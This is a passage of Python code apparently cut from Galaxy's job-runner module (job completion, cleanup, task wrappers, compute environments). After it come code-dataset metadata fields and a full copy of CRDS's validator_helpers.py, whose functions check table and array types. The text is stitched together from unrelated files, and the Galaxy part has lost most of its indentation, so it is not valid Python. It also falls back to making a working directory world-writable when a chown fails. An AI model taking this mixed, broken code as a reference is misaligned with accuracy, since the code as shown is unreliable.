log.info( "stderr for job %d is greater than %s, only a portion will be logged to database" % ( job.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
job.stderr = util.shrink_string_by_size( job.stderr, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
# The exit code will be null if there is no exit code to be set.
# This is so that we don't assign an exit code, such as 0, that
# is either incorrect or has the wrong semantics.
        if tool_exit_code is not None:
job.exit_code = tool_exit_code
# custom post process setup
inp_data = dict( [ ( da.name, da.dataset ) for da in job.input_datasets ] )
out_data = dict( [ ( da.name, da.dataset ) for da in job.output_datasets ] )
inp_data.update( [ ( da.name, da.dataset ) for da in job.input_library_datasets ] )
out_data.update( [ ( da.name, da.dataset ) for da in job.output_library_datasets ] )
# TODO: eliminate overlap with tools/evaluation.py
out_collections = dict( [ ( obj.name, obj.dataset_collection_instance ) for obj in job.output_dataset_collection_instances ] )
out_collections.update( [ ( obj.name, obj.dataset_collection ) for obj in job.output_dataset_collections ] )
input_ext = 'data'
for _, data in inp_data.items():
            # For loop odd, but sort of simulating behavior in galaxy.tools.actions
if not data:
continue
input_ext = data.ext
        param_dict = dict( [ ( p.name, p.value ) for p in job.parameters ] )  # why not re-use self.param_dict here? Unknown, but probably should; this causes tools.parameters.basic.UnvalidatedValue to be used in the following methods instead of validated and transformed values when e.g. running workflows
param_dict = self.tool.params_from_strings( param_dict, self.app )
# Check for and move associated_files
self.tool.collect_associated_files(out_data, self.working_directory)
# Create generated output children and primary datasets and add to param_dict
collected_datasets = {
'children': self.tool.collect_child_datasets(out_data, self.working_directory),
'primary': self.tool.collect_primary_datasets(out_data, self.working_directory, input_ext)
}
self.tool.collect_dynamic_collections(
out_collections,
job_working_directory=self.working_directory,
inp_data=inp_data,
job=job,
)
param_dict.update({'__collected_datasets__': collected_datasets})
# Certain tools require tasks to be completed after job execution
# ( this used to be performed in the "exec_after_process" hook, but hooks are deprecated ).
self.tool.exec_after_process( self.queue.app, inp_data, out_data, param_dict, job=job )
# Call 'exec_after_process' hook
self.tool.call_hook( 'exec_after_process', self.queue.app, inp_data=inp_data,
out_data=out_data, param_dict=param_dict,
tool=self.tool, stdout=job.stdout, stderr=job.stderr )
job.command_line = self.command_line
bytes = 0
# Once datasets are collected, set the total dataset size (includes extra files)
for dataset_assoc in job.output_datasets:
dataset_assoc.dataset.dataset.set_total_size()
bytes += dataset_assoc.dataset.dataset.get_total_size()
if job.user:
job.user.total_disk_usage += bytes
# fix permissions
for path in [ dp.real_path for dp in self.get_mutable_output_fnames() ]:
util.umask_fix_perms( path, self.app.config.umask, 0666, self.app.config.gid )
# Finally set the job state. This should only happen *after* all
# dataset creation, and will allow us to eliminate force_history_refresh.
job.set_final_state( final_job_state )
if not job.tasks:
            # If job was composed of tasks, don't attempt to recollect statistics
self._collect_metrics( job )
self.sa_session.flush()
log.debug( 'job %d ended' % self.job_id )
delete_files = self.app.config.cleanup_job == 'always' or ( job.state == job.states.OK and self.app.config.cleanup_job == 'onsuccess' )
self.cleanup( delete_files=delete_files )
def check_tool_output( self, stdout, stderr, tool_exit_code, job ):
return check_output( self.tool, stdout, stderr, tool_exit_code, job )
def cleanup( self, delete_files=True ):
        # At least one of these tool cleanup actions (job import) is needed
        # for the tool to work properly, which is why one might want to run
        # cleanup but not delete files.
try:
if delete_files:
for fname in self.extra_filenames:
os.remove( fname )
self.external_output_metadata.cleanup_external_metadata( self.sa_session )
galaxy.tools.imp_exp.JobExportHistoryArchiveWrapper( self.job_id ).cleanup_after_job( self.sa_session )
galaxy.tools.imp_exp.JobImportHistoryArchiveWrapper( self.app, self.job_id ).cleanup_after_job()
if delete_files:
self.app.object_store.delete(self.get_job(), base_dir='job_work', entire_dir=True, dir_only=True, extra_dir=str(self.job_id))
except:
log.exception( "Unable to cleanup job %d" % self.job_id )
def _collect_metrics( self, has_metrics ):
job = has_metrics.get_job()
per_plugin_properties = self.app.job_metrics.collect_properties( job.destination_id, self.job_id, self.working_directory )
if per_plugin_properties:
log.info( "Collecting job metrics for %s" % has_metrics )
for plugin, properties in per_plugin_properties.iteritems():
for metric_name, metric_value in properties.iteritems():
if metric_value is not None:
has_metrics.add_metric( plugin, metric_name, metric_value )
def get_output_sizes( self ):
sizes = []
output_paths = self.get_output_fnames()
for outfile in [ str( o ) for o in output_paths ]:
if os.path.exists( outfile ):
sizes.append( ( outfile, os.stat( outfile ).st_size ) )
else:
sizes.append( ( outfile, 0 ) )
return sizes
def check_limits(self, runtime=None):
if self.app.job_config.limits.output_size > 0:
for outfile, size in self.get_output_sizes():
if size > self.app.job_config.limits.output_size:
log.warning( '(%s) Job output size %s has exceeded the global output size limit', self.get_id_tag(), os.path.basename( outfile ) )
return JobState.runner_states.OUTPUT_SIZE_LIMIT, 'Job output file grew too large (greater than %s), please try different inputs or parameters' % util.nice_size( self.app.job_config.limits.output_size )
if self.app.job_config.limits.walltime_delta is not None and runtime is not None:
if runtime > self.app.job_config.limits.walltime_delta:
log.warning( '(%s) Job runtime %s has exceeded the global walltime, it will be terminated', self.get_id_tag(), runtime )
return JobState.runner_states.GLOBAL_WALLTIME_REACHED, 'Job ran longer than the maximum allowed execution time (runtime: %s, limit: %s), please try different inputs or parameters' % ( str(runtime).split('.')[0], self.app.job_config.limits.walltime )
return None
def has_limits( self ):
has_output_limit = self.app.job_config.limits.output_size > 0
has_walltime_limit = self.app.job_config.limits.walltime_delta is not None
return has_output_limit or has_walltime_limit
def get_command_line( self ):
return self.command_line
def get_session_id( self ):
return self.session_id
def get_env_setup_clause( self ):
if self.app.config.environment_setup_file is None:
return ''
return '[ -f "%s" ] && . %s' % ( self.app.config.environment_setup_file, self.app.config.environment_setup_file )
def get_input_dataset_fnames( self, ds ):
filenames = []
filenames = [ ds.file_name ]
#we will need to stage in metadata file names also
#TODO: would be better to only stage in metadata files that are actually needed (found in command line, referenced in config files, etc.)
for key, value in ds.metadata.items():
if isinstance( value, model.MetadataFile ):
filenames.append( value.file_name )
return filenames
def get_input_fnames( self ):
job = self.get_job()
filenames = []
for da in job.input_datasets + job.input_library_datasets: # da is JobToInputDatasetAssociation object
if da.dataset:
filenames.extend(self.get_input_dataset_fnames(da.dataset))
return filenames
def get_input_paths( self, job=None ):
if job is None:
job = self.get_job()
paths = []
for da in job.input_datasets + job.input_library_datasets: # da is JobToInputDatasetAssociation object
if da.dataset:
filenames = self.get_input_dataset_fnames(da.dataset)
for real_path in filenames:
false_path = self.dataset_path_rewriter.rewrite_dataset_path( da.dataset, 'input' )
paths.append( DatasetPath( da.id, real_path=real_path, false_path=false_path, mutable=False ) )
return paths
def get_output_fnames( self ):
if self.output_paths is None:
self.compute_outputs()
return self.output_paths
def get_mutable_output_fnames( self ):
if self.output_paths is None:
self.compute_outputs()
return filter( lambda dsp: dsp.mutable, self.output_paths )
def get_output_hdas_and_fnames( self ):
if self.output_hdas_and_paths is None:
self.compute_outputs()
return self.output_hdas_and_paths
def compute_outputs( self ) :
dataset_path_rewriter = self.dataset_path_rewriter
job = self.get_job()
# Job output datasets are combination of history, library, and jeha datasets.
special = self.sa_session.query( model.JobExportHistoryArchive ).filter_by( job=job ).first()
false_path = None
results = []
for da in job.output_datasets + job.output_library_datasets:
da_false_path = dataset_path_rewriter.rewrite_dataset_path( da.dataset, 'output' )
mutable = da.dataset.dataset.external_filename is None
dataset_path = DatasetPath( da.dataset.dataset.id, da.dataset.file_name, false_path=da_false_path, mutable=mutable )
results.append( ( da.name, da.dataset, dataset_path ) )
self.output_paths = [t[2] for t in results]
self.output_hdas_and_paths = dict([(t[0], t[1:]) for t in results])
if special:
false_path = dataset_path_rewriter.rewrite_dataset_path( special.dataset, 'output' )
dsp = DatasetPath( special.dataset.id, special.dataset.file_name, false_path )
self.output_paths.append( dsp )
return self.output_paths
def get_output_file_id( self, file ):
if self.output_paths is None:
self.get_output_fnames()
for dp in self.output_paths:
if self.app.config.outputs_to_working_directory and os.path.basename( dp.false_path ) == file:
return dp.dataset_id
elif os.path.basename( dp.real_path ) == file:
return dp.dataset_id
return None
def get_tool_provided_job_metadata( self ):
if self.tool_provided_job_metadata is not None:
return self.tool_provided_job_metadata
# Look for JSONified job metadata
self.tool_provided_job_metadata = []
meta_file = os.path.join( self.working_directory, TOOL_PROVIDED_JOB_METADATA_FILE )
if os.path.exists( meta_file ):
for line in open( meta_file, 'r' ):
try:
line = loads( line )
assert 'type' in line
except:
log.exception( '(%s) Got JSON data from tool, but data is improperly formatted or no "type" key in data' % self.job_id )
log.debug( 'Offending data was: %s' % line )
continue
# Set the dataset id if it's a dataset entry and isn't set.
# This isn't insecure. We loop the job's output datasets in
# the finish method, so if a tool writes out metadata for a
# dataset id that it doesn't own, it'll just be ignored.
if line['type'] == 'dataset' and 'dataset_id' not in line:
try:
line['dataset_id'] = self.get_output_file_id( line['dataset'] )
except KeyError:
log.warning( '(%s) Tool provided job dataset-specific metadata without specifying a dataset' % self.job_id )
continue
self.tool_provided_job_metadata.append( line )
return self.tool_provided_job_metadata
def get_dataset_finish_context( self, job_context, dataset ):
for meta in self.get_tool_provided_job_metadata():
if meta['type'] == 'dataset' and meta['dataset_id'] == dataset.id:
return ExpressionContext( meta, job_context )
return job_context
def setup_external_metadata( self, exec_dir=None, tmp_dir=None, dataset_files_path=None, config_root=None, config_file=None, datatypes_config=None, set_extension=True, **kwds ):
# extension could still be 'auto' if this is the upload tool.
job = self.get_job()
if set_extension:
for output_dataset_assoc in job.output_datasets:
if output_dataset_assoc.dataset.ext == 'auto':
context = self.get_dataset_finish_context( dict(), output_dataset_assoc.dataset.dataset )
output_dataset_assoc.dataset.extension = context.get( 'ext', 'data' )
self.sa_session.flush()
if tmp_dir is None:
            # this dir should be relative to the exec_dir
tmp_dir = self.app.config.new_file_path
if dataset_files_path is None:
dataset_files_path = self.app.model.Dataset.file_path
if config_root is None:
config_root = self.app.config.root
if config_file is None:
config_file = self.app.config.config_file
if datatypes_config is None:
datatypes_config = self.app.datatypes_registry.integrated_datatypes_configs
return self.external_output_metadata.setup_external_metadata( [ output_dataset_assoc.dataset for output_dataset_assoc in job.output_datasets + job.output_library_datasets ],
self.sa_session,
exec_dir=exec_dir,
tmp_dir=tmp_dir,
dataset_files_path=dataset_files_path,
config_root=config_root,
config_file=config_file,
datatypes_config=datatypes_config,
job_metadata=os.path.join( self.working_directory, TOOL_PROVIDED_JOB_METADATA_FILE ),
**kwds )
@property
def user( self ):
job = self.get_job()
if job.user is not None:
return job.user.email
elif job.galaxy_session is not None and job.galaxy_session.user is not None:
return job.galaxy_session.user.email
elif job.history is not None and job.history.user is not None:
return job.history.user.email
elif job.galaxy_session is not None:
return 'anonymous@' + job.galaxy_session.remote_addr.split()[-1]
else:
return 'anonymous@unknown'
def __link_file_check( self ):
""" outputs_to_working_directory breaks library uploads where data is
linked. This method is a hack that solves that problem, but is
specific to the upload tool and relies on an injected job param. This
method should be removed ASAP and replaced with some properly generic
and stateful way of determining link-only datasets. -nate
"""
job = self.get_job()
param_dict = job.get_param_values( self.app )
return self.tool.id == 'upload1' and param_dict.get( 'link_data_only', None ) == 'link_to_files'
def _change_ownership( self, username, gid ):
job = self.get_job()
# FIXME: hardcoded path
cmd = [ '/usr/bin/sudo', '-E', self.app.config.external_chown_script, self.working_directory, username, str( gid ) ]
log.debug( '(%s) Changing ownership of working directory with: %s' % ( job.id, ' '.join( cmd ) ) )
p = subprocess.Popen( cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE )
# TODO: log stdout/stderr
stdout, stderr = p.communicate()
assert p.returncode == 0
def change_ownership_for_run( self ):
job = self.get_job()
if self.app.config.external_chown_script and job.user is not None:
try:
self._change_ownership( self.user_system_pwent[0], str( self.user_system_pwent[3] ) )
except:
log.exception( '(%s) Failed to change ownership of %s, making world-writable instead' % ( job.id, self.working_directory ) )
os.chmod( self.working_directory, 0777 )
def reclaim_ownership( self ):
job = self.get_job()
if self.app.config.external_chown_script and job.user is not None:
self._change_ownership( self.galaxy_system_pwent[0], str( self.galaxy_system_pwent[3] ) )
@property
def user_system_pwent( self ):
if self.__user_system_pwent is None:
job = self.get_job()
try:
self.__user_system_pwent = pwd.getpwnam( job.user.email.split('@')[0] )
except:
pass
return self.__user_system_pwent
@property
def galaxy_system_pwent( self ):
if self.__galaxy_system_pwent is None:
self.__galaxy_system_pwent = pwd.getpwuid(os.getuid())
return self.__galaxy_system_pwent
def get_output_destination( self, output_path ):
"""
Destination for outputs marked as from_work_dir. This is the normal case,
        just copy these files directly to the ultimate destination.
"""
return output_path
@property
def requires_setting_metadata( self ):
if self.tool:
return self.tool.requires_setting_metadata
return False
class TaskWrapper(JobWrapper):
"""
Extension of JobWrapper intended for running tasks.
Should be refactored into a generalized executable unit wrapper parent, then jobs and tasks.
"""
# Abstract this to be more useful for running tasks that *don't* necessarily compose a job.
def __init__(self, task, queue):
super(TaskWrapper, self).__init__(task.job, queue)
self.task_id = task.id
working_directory = task.working_directory
self.working_directory = working_directory
job_dataset_path_rewriter = self._job_dataset_path_rewriter( self.working_directory )
self.dataset_path_rewriter = TaskPathRewriter( working_directory, job_dataset_path_rewriter )
if task.prepare_input_files_cmd is not None:
self.prepare_input_files_cmds = [ task.prepare_input_files_cmd ]
else:
self.prepare_input_files_cmds = None
self.status = task.states.NEW
def can_split( self ):
# Should the job handler split this job up? TaskWrapper should
# always return False as the job has already been split.
return False
def get_job( self ):
if self.job_id:
return self.sa_session.query( model.Job ).get( self.job_id )
else:
return None
def get_task( self ):
return self.sa_session.query(model.Task).get(self.task_id)
def get_id_tag(self):
# For compatibility with drmaa job runner and TaskWrapper, instead of using job_id directly
return self.get_task().get_id_tag()
def get_param_dict( self ):
"""
Restore the dictionary of parameters from the database.
"""
job = self.sa_session.query( model.Job ).get( self.job_id )
param_dict = dict( [ ( p.name, p.value ) for p in job.parameters ] )
param_dict = self.tool.params_from_strings( param_dict, self.app )
return param_dict
def prepare( self, compute_environment=None ):
"""
Prepare the job to run by creating the working directory and the
config files.
"""
# Restore parameters from the database
job = self._load_job()
task = self.get_task()
# DBTODO New method for generating command line for a task?
tool_evaluator = self._get_tool_evaluator( job )
compute_environment = compute_environment or self.default_compute_environment( job )
tool_evaluator.set_compute_environment( compute_environment )
self.sa_session.flush()
self.command_line, self.extra_filenames = tool_evaluator.build()
# FIXME: for now, tools get Galaxy's lib dir in their path
if self.command_line and self.command_line.startswith( 'python' ):
self.galaxy_lib_dir = os.path.abspath( "lib" ) # cwd = galaxy root
# Shell fragment to inject dependencies
self.dependency_shell_commands = self.tool.build_dependency_shell_commands()
# We need command_line persisted to the db in order for Galaxy to re-queue the job
# if the server was stopped and restarted before the job finished
task.command_line = self.command_line
self.sa_session.add( task )
self.sa_session.flush()
self.param_dict = tool_evaluator.param_dict
self.status = 'prepared'
return self.extra_filenames
def fail( self, message, exception=False ):
log.error("TaskWrapper Failure %s" % message)
self.status = 'error'
# How do we want to handle task failure? Fail the job and let it clean up?
def change_state( self, state, info=False ):
task = self.get_task()
self.sa_session.refresh( task )
if info:
task.info = info
task.state = state
self.sa_session.add( task )
self.sa_session.flush()
def get_state( self ):
task = self.get_task()
self.sa_session.refresh( task )
return task.state
def get_exit_code( self ):
task = self.get_task()
self.sa_session.refresh( task )
return task.exit_code
def set_runner( self, runner_url, external_id ):
task = self.get_task()
self.sa_session.refresh( task )
task.task_runner_name = runner_url
task.task_runner_external_id = external_id
# DBTODO Check task job_runner_stuff
self.sa_session.add( task )
self.sa_session.flush()
def finish( self, stdout, stderr, tool_exit_code=None ):
# DBTODO integrate previous finish logic.
# Simple finish for tasks. Just set the flag OK.
"""
Called to indicate that the associated command has been run. Updates
the output datasets based on stderr and stdout from the command, and
the contents of the output files.
"""
stdout = unicodify( stdout )
stderr = unicodify( stderr )
# This may have ended too soon
log.debug( 'task %s for job %d ended; exit code: %d'
% (self.task_id, self.job_id,
tool_exit_code if tool_exit_code != None else -256 ) )
# default post job setup_external_metadata
self.sa_session.expunge_all()
task = self.get_task()
# if the job was deleted, don't finish it
if task.state == task.states.DELETED:
# Job was deleted by an administrator
delete_files = self.app.config.cleanup_job in ( 'always', 'onsuccess' )
self.cleanup( delete_files=delete_files )
return
elif task.state == task.states.ERROR:
self.fail( task.info )
return
# Check what the tool returned. If the stdout or stderr matched
# regular expressions that indicate errors, then set an error.
# The same goes if the tool's exit code was in a given range.
if ( self.check_tool_output( stdout, stderr, tool_exit_code, task ) ):
task.state = task.states.OK
else:
task.state = task.states.ERROR
# Save stdout and stderr
if len( stdout ) > DATABASE_MAX_STRING_SIZE:
log.error( "stdout for task %d is greater than %s, only a portion will be logged to database" % ( task.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
task.stdout = util.shrink_string_by_size( stdout, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
if len( stderr ) > DATABASE_MAX_STRING_SIZE:
log.error( "stderr for task %d is greater than %s, only a portion will be logged to database" % ( task.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
self._collect_metrics( task )
task.stderr = util.shrink_string_by_size( stderr, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
task.exit_code = tool_exit_code
task.command_line = self.command_line
self.sa_session.flush()
def cleanup( self ):
# There is no task cleanup. The job cleans up for all tasks.
pass
def get_command_line( self ):
return self.command_line
def get_session_id( self ):
return self.session_id
def get_output_file_id( self, file ):
# There is no permanent output file for tasks.
return None
def get_tool_provided_job_metadata( self ):
# DBTODO Handle this as applicable for tasks.
return None
def get_dataset_finish_context( self, job_context, dataset ):
# Handled at the parent job level. Do nothing here.
pass
def setup_external_metadata( self, exec_dir=None, tmp_dir=None, dataset_files_path=None, config_root=None, config_file=None, datatypes_config=None, set_extension=True, **kwds ):
# There is no metadata setting for tasks. This is handled after the merge, at the job level.
return ""
def get_output_destination( self, output_path ):
"""
Destination for outputs marked as from_work_dir. These must be copied with
        the same basename as the path for the ultimate output destination. This is
required in the task case so they can be merged.
"""
return os.path.join( self.working_directory, os.path.basename( output_path ) )
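        # Illustration (editor's note, not part of the original source): an output
        # path like '<job dir>/dataset_42.dat' would be returned here as
        # '<task working dir>/dataset_42.dat', so the parent job can later merge
        # the per-task copies; the paths shown are purely hypothetical.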
class ComputeEnvironment( object ):
""" Definition of the job as it will be run on the (potentially) remote
compute server.
"""
__metaclass__ = ABCMeta
@abstractmethod
def output_paths( self ):
""" Output DatasetPaths defined by job. """
@abstractmethod
def input_paths( self ):
""" Input DatasetPaths defined by job. """
@abstractmethod
def working_directory( self ):
""" Job working directory (potentially remote) """
@abstractmethod
def config_directory( self ):
""" Directory containing config files (potentially remote) """
@abstractmethod
def sep( self ):
""" os.path.sep for the platform this job will execute in.
"""
@abstractmethod
def new_file_path( self ):
""" Absolute path to dump new files for this job on compute server. """
@abstractmethod
def tool_directory( self ):
""" Absolute path to tool files for this job on compute server. """
@abstractmethod
def version_path( self ):
""" Location of the version file for the underlying tool. """
@abstractmethod
def unstructured_path_rewriter( self ):
""" Return a function that takes in a value, determines if it is path
to be rewritten (will be passed non-path values as well - onus is on
this function to determine both if its input is a path and if it should
be rewritten.)
"""
class SimpleComputeEnvironment( object ):
def config_directory( self ):
return self.working_directory( )
def sep( self ):
return os.path.sep
def unstructured_path_rewriter( self ):
return lambda v: v
class SharedComputeEnvironment( SimpleComputeEnvironment ):
""" Default ComputeEnviornment for job and task wrapper to pass
to ToolEvaluator - valid when Galaxy and compute share all the relevant
file systems.
"""
def __init__( self, job_wrapper, job ):
self.app = job_wrapper.app
self.job_wrapper = job_wrapper
self.job = job
def output_paths( self ):
return self.job_wrapper.get_output_fnames()
def input_paths( self ):
return self.job_wrapper.get_input_paths( self.job )
def working_directory( self ):
return self.job_wrapper.working_directory
def new_file_path( self ):
return os.path.abspath( self.app.config.new_file_path )
def version_path( self ):
return self.job_wrapper.get_version_string_path()
def tool_directory( self ):
return os.path.abspath(self.job_wrapper.tool.tool_dir)
class NoopQueue( object ):
"""
Implements the JobQueue / JobStopQueue interface but does nothing
"""
def put( self, *args, **kwargs ):
return
def put_stop( self, *args ):
return
def shutdown( self ):
return
class ParallelismInfo(object):
"""
Stores the information (if any) for running multiple instances of the tool in parallel
on the same set of inputs.
"""
def __init__(self, tag):
self.method = tag.get('method')
if isinstance(tag, dict):
items = tag.iteritems()
else:
items = tag.attrib.items()
self.attributes = dict( [ item for item in items if item[ 0 ] != 'method' ])
if len(self.attributes) == 0:
# legacy basic mode - provide compatible defaults
self.attributes['split_size'] = 20
self.attributes['split_mode'] = 'number_of_parts'
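# --- Editor's illustrative sketch, not part of the original Galaxy source. ---
# Shows the legacy default handling above: when only 'method' is supplied (here
# as a plain dict, which __init__ also accepts), the compatible split defaults
# are filled in. The function name below is hypothetical.
def _example_parallelism_defaults():
    info = ParallelismInfo({'method': 'basic'})
    # 'attributes' is empty after filtering out 'method', so the legacy defaults
    # apply: split_size == 20 and split_mode == 'number_of_parts'
    return info.method, info.attributes['split_size'], info.attributes['split_mode']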
| 47.63806
| 301
| 0.622789
|
f0f9fd7d14ec89840015dd254fee46ceff0dc108
| 14,349
|
py
|
Python
|
crds/certify/validator_helpers.py
|
sean-lockwood/crds
|
f071f59deca98aac4bee04d688805a127761f3d2
|
[
"BSD-3-Clause"
] | null | null | null |
crds/certify/validator_helpers.py
|
sean-lockwood/crds
|
f071f59deca98aac4bee04d688805a127761f3d2
|
[
"BSD-3-Clause"
] | 1
|
2019-04-11T18:19:16.000Z
|
2019-04-11T18:19:16.000Z
|
crds/certify/validator_helpers.py
|
sean-lockwood/crds
|
f071f59deca98aac4bee04d688805a127761f3d2
|
[
"BSD-3-Clause"
] | null | null | null |
"""This module defines helper functions that are used in "expression" validators,
either in a "presence" condition or as the "constraint" condition. The expressions
themselves appear in .tpn files and are dynamically eval'ed in the context of a reference
header and other globals like these functions.
These functions are used to keep the .tpn expressions comparatively simple since those
are restricted to a pidgin Python that does not allow spaces. See the JWST .tpn files
(particularly *array*.tpn) for examples of presence or constraint expressions, grep
those files for these functions.
"""
from crds.core import utils, exceptions
# ----------------------------------------------------------------------------
# Table check expression helper functions
def has_columns(array_info, col_names):
"""Return True IFF CRDS `array_info` object defines `col_names` columns in any order.
>>> has_columns(utils.Struct(COLUMN_NAMES=["THIS","THAT","ANOTHER"]), ["THAT","ANOTHER","THIS"])
True
>>> has_columns(utils.Struct(COLUMN_NAMES=["THIS","THAT","ANOTHER"]), ["THAT","ANOTHER","FOO"])
False
>>> has_columns("UNDEFINED", ["THAT","ANOTHER","FOO"])
False
NOTE: does not disallow extra columns not listed.
"""
if not array_exists(array_info):
return False
for col in col_names:
if col not in array_info.COLUMN_NAMES:
return False
return True
def has_type(array_info, typestr):
"""Return True IFF CRDS `array_info` object has a data array of type `typestr`.
>>> has_type(utils.Struct({"DATA_TYPE" : "int8"}), "INT")
True
>>> has_type(utils.Struct({"DATA_TYPE" : "uint64"}), "INTEGER")
True
>>> has_type(utils.Struct({"DATA_TYPE" : "float64"}), "INTEGER")
False
>>> has_type(utils.Struct({"DATA_TYPE" : "float32"}), "FLOAT")
True
>>> has_type(utils.Struct({"DATA_TYPE" : "float32"}), "INT")
False
>>> has_type(utils.Struct({"DATA_TYPE" : "float64"}), "FLOAT")
True
>>> has_type(utils.Struct({"DATA_TYPE" : "complex32"}), "COMPLEX")
True
>>> has_type(utils.Struct({"DATA_TYPE" : "complex64"}), "COMPLEX")
True
>>> has_type(utils.Struct({"DATA_TYPE" : "complex64"}), "FLOAT")
False
>>> has_type(utils.Struct({"DATA_TYPE" : "complex64"}), ["FLOAT","INT"])
False
>>> has_type(utils.Struct({"DATA_TYPE" : "complex64"}), ["COMPLEX","INT"])
True
"""
possible_types = [typestr] if isinstance(typestr, str) else typestr
for possible_type in possible_types:
itype = _image_type(possible_type)
if array_exists(array_info) and itype in array_info.DATA_TYPE:
return True
return False
def _image_type(typestr):
"""Return the translation of CRDS fuzzy type name `typestr` into numpy dtype str() prefixes.
If CRDS has no definition for `typestr`, return it unchanged.
"""
return {
'COMPLEX':'complex',
'INT' : 'int',
'INTEGER' : 'int',
'FLOAT' : 'float',
'BOOLEAN' : 'bool'
}.get(typestr, typestr)
def has_column_type(array_info, col_name, typestr):
"""Return True IFF column `col_name` of CRDS `array_info` object has a
data array of type `typestr`.
>>> has_column_type(utils.Struct(DATA_TYPE={"WAVELENGTH":">f4"}), "WAVELENGTH", "FLOAT")
True
>>> has_column_type(utils.Struct(DATA_TYPE={"WAVELENGTH":">f4"}), "WAVELENGTH", "INTEGER")
False
>>> has_column_type("UNDEFINED", "WAVELENGTH", "INTEGER")
False
>>> has_column_type(utils.Struct(DATA_TYPE={"WAVELENGTH":">f4"}), "WAVELEN", "INTEGER")
Traceback (most recent call last):
...
crds.core.exceptions.MissingColumnError: Data type not defined for column 'WAVELEN'
"""
if not array_exists(array_info):
return False
typestrs = _table_type(typestr)
try:
for typestr in typestrs:
if typestr in array_info.DATA_TYPE[col_name.upper()]:
return True
return False
except KeyError:
pass
raise exceptions.MissingColumnError("Data type not defined for column", repr(col_name))
def _table_type(typestr):
"""Return the translation of CRDS fuzzy type name `typestr` into numpy dtype str() prefixes.
If CRDS has no definition for `typestr`, return it unchanged.
"""
int_types = [">i","<i","uint","int"]
float_types = [">f","<f","float","float"]
complex_types = [">c","<c","complex","complex"]
string_types = ["|S"]
def _array_types(types):
return ["('" + typestr for typestr in types]
trans = {
'COMPLEX': complex_types,
'COMPLEX_ARRAY': _array_types(complex_types),
'INT' : int_types,
'INTEGER' : int_types,
'INT_ARRAY' : _array_types(int_types),
'INTEGER_ARRAY' : _array_types(int_types),
'FLOAT' : float_types,
'FLOAT_ARRAY' : _array_types(float_types),
'STR' : string_types,
'STRING' : string_types,
'STR_ARRAY' : _array_types(string_types),
'STRING_ARRAY' : _array_types(string_types),
}.get(typestr, typestr)
return trans
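# For example, _table_type("FLOAT") returns [">f", "<f", "float", "float"] and
# _table_type("STRING_ARRAY") returns ["('|S"]; an unknown name such as "int16"
# is passed through unchanged.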
def is_table(array_info):
"""Return True IFF CRDS `array_info` object corresponds to a table.
>>> is_table(utils.Struct(KIND="IMAGE"))
False
>>> is_table(utils.Struct(KIND="TABLE"))
True
"""
return array_exists(array_info) and array_info.KIND=="TABLE"
def is_image(array_info):
"""Return True IFF CRDS `array_info` object corresponds to an image.
>>> is_image(utils.Struct(KIND="IMAGE"))
True
>>> is_image(utils.Struct(KIND="TABLE"))
False
"""
return array_exists(array_info) and array_info.KIND=="IMAGE"
def array_exists(array_info):
"""Return True IFF array_info is not UNDEFINED.
>>> array_exists("UNDEFINED")
False
>>> array_exists(utils.Struct({"KIND":"IMAGE", "SHAPE" : (2048,2048), "TYPE": "float32"}))
True
"""
return array_info != "UNDEFINED"
def is_imaging_mode(exp_type):
"""Return True IFF `exp_type` is one of the imaging modes for any instrument.
>>> is_imaging_mode('MIR_IMAGE')
True
>>> is_imaging_mode("NRS_IFU")
False
"""
return exp_type in ["NRC_IMAGE", "NRC_TACQ", "NRC_TACONF", "NRC_CORON", "NRC_TSIMAGE",
"NRC_FOCUS", "NRC_DARK", "NRC_FLAT", "NRC_LED",
"MIR_IMAGE", "MIR_TACQ", "MIR_LYOT", "MIR_4QPM", "MIR_DARK",
"MIR_FLATIMAGE", "MIR_CORONCAL",
"NRS_TASLIT", "NRS_TACQ", "NRS_TACONFIRM",
"NRS_CONFIRM", "NRS_IMAGE", "NRS_FOCUS", "NRS_DARK", "NRS_MIMF",
"NIS_IMAGE", "NIS_TACQ", "NIS_TACONFIRM", "NIS_AMI",
"NIS_FOCUS", "NIS_DARK", "NIS_LAMP",
"FGS_IMAGE", "FGS_FOCUS", "FGS_SKYFLAT", "FGS_INTFLAT", "FGS_DARK", "FGS_ID-STACK"]
def is_full_frame(subarray):
"""Return True IFF `subarray` is defined and has a full frame subarray value.
>>> is_full_frame("UNDEFINED")
False
>>> is_full_frame("FULL")
True
>>> is_full_frame("GENERIC")
True
>>> is_full_frame("N/A")
True
>>> is_full_frame("ANY")
True
>>> is_full_frame("*")
True
>>> is_full_frame("MASK1140")
False
>>> is_full_frame("BRIGHTSKY")
False
"""
return subarray in ["FULL","GENERIC","N/A","ANY","*"]
def is_subarray(subarray):
"""Return True IFF `subarray` is defined and is not a full frame value.
>>> is_subarray("UNDEFINED")
False
>>> is_subarray("GENERIC")
False
>>> is_subarray("N/A")
False
>>> is_subarray("ANY")
False
>>> is_subarray("*")
False
>>> is_subarray("FULL")
False
>>> is_subarray("MASK1140")
True
>>> is_subarray("BRIGHTSKY")
True
"""
return (subarray != "UNDEFINED") and not is_full_frame(subarray)
def subarray_defined(header):
"""Return True IFF SUBARRAY related keywords are defined.
>>> header = dict(SUBARRAY="GENERIC",SUBSTRT1="1",SUBSTRT2="1",SUBSIZE1="2048",SUBSIZE2="2048")
>>> subarray_defined(header)
True
>>> header = dict(SUBARRAY="GENERIC",SUBSTRT1="1",SUBSTRT2="1",SUBISIZE2="2048")
>>> subarray_defined(header)
False
"""
for keyword in ["SUBARRAY","SUBSTRT1","SUBSTRT2","SUBSIZE1","SUBSIZE2"]:
value = header.get(keyword,"UNDEFINED")
if value == "UNDEFINED":
return False
return True
def is_irs2(readpatt):
"""Return True IFF `readpatt` is one of the IRS2 READPATTs.
>>> is_irs2("NRSIRS2")
True
>>> is_irs2("NRSIRS2RAPID")
True
>>> is_irs2("NRSN32R8")
False
>>> is_irs2("ALLIRS2")
True
"""
return 'IRS2' in readpatt
def is_defined(value):
"""Return True IFF `value` is not 'UNDEFINED' or None.
>>> is_defined("UNDEFINED")
False
>>> is_defined(None)
False
>>> is_defined("FOO")
True
"""
return value not in ["UNDEFINED", None]
# # @utils.traced
